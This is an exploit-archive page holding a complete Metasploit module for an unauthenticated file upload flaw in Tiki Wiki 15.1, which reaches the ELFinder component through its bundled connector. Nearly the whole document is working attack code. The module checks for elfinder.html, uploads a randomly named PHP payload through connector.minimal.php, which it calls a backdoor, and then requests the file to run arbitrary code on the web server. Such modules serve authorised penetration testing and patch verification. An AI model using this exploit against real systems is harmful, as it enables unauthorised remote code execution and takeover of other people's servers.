Tiki Wiki 15.1 - Unauthenticated File Upload Vulnerability (msf)



EKU-ID: 5688 CVE: OSVDB-ID:
Author: Mehmet Ince Published: 2016-07-12 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
 
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  include Msf::Exploit::Remote::HttpClient
 
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Tiki Wiki Unauthenticated File Upload Vulnerability',
      'Description'    => %q{
          This module exploits a file upload vulnerability in Tiki Wiki <= 15.1
        which could be abused to allow unauthenticated users to execute arbitrary code
        under the context of the webserver user.
 
        The issue comes with one of the 3rd party components. Name of that components is
        ELFinder -version 2.0-. This components comes with default example page which
        demonstrates file operations such as upload, remove, rename, create directory etc.
        Default configuration does not force validations such as file extension, content-type etc.
        Thus, unauthenticated user can upload PHP file.
 
        The exploit has been tested on Debian 8.x 64bit and Tiki Wiki 15.1.
      },
      'Author' =>
        [
          'Mehmet Ince <mehmet@mehmetince.net>' # Vulnerability discovery and Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'URL', 'https://www.mehmetince.net/exploit/tiki-wiki-unauthenticated-file-upload-vulnerability' ],
          [ 'URL', 'https://tiki.org/article434-Security-update-Tiki-15-2-Tiki-14-4-and-Tiki-12-9-released' ]
        ],
      'Privileged'     => false,
      'Platform'       => ['php'],
      'Arch'           => ARCH_PHP,
      'Payload'        =>
        {
          'DisableNops' => true
        },
      'Targets'        => [ ['Automatic', {}] ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Jul 11 2016'
      ))
 
      register_options(
        [
          OptString.new('TARGETURI', [ true, "Installed path of Tiki Wiki", "/tiki/"])
        ], self.class)
  end
 
  def check
    url = normalize_uri(target_uri.path, "vendor_extra/elfinder/elfinder.html")
    res = send_request_cgi(
        'method' => 'GET',
        'uri' => normalize_uri(url)
    )
    if res && res.code == 200
      return Exploit::CheckCode::Appears
    end
    return Exploit::CheckCode::Safe
  end
 
  def exploit
    filename = rand_text_alpha(8 + rand(4)) + '.php'
    data = Rex::MIME::Message.new
    data.add_part('upload', nil, nil, 'form-data; name="cmd"')
    data.add_part('l1_Lw', nil, nil, 'form-data; name="target"')
    data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"upload[]\"; filename=\"#{filename}\"")
    print_status("Uploading backdoor file.")
    res = send_request_cgi({
      'method'   => 'POST',
      'uri'      => normalize_uri(target_uri.path, "vendor_extra/elfinder/php/connector.minimal.php"),
      'ctype'    => "multipart/form-data; boundary=#{data.bound}",
      'data'     => data.to_s
     })
    if res && res.code == 200
      print_good("Backdoor successfully created.")
    else
      fail_with(Failure::Unknown, "#{peer} - Error on uploading file")
    end
    print_status("Trigging the exploit...")
    send_request_cgi({
      'method'  => 'GET',
      'uri'     => normalize_uri(target_uri.path, "vendor_extra/elfinder/files/" + filename)
     }, 5)
  end
end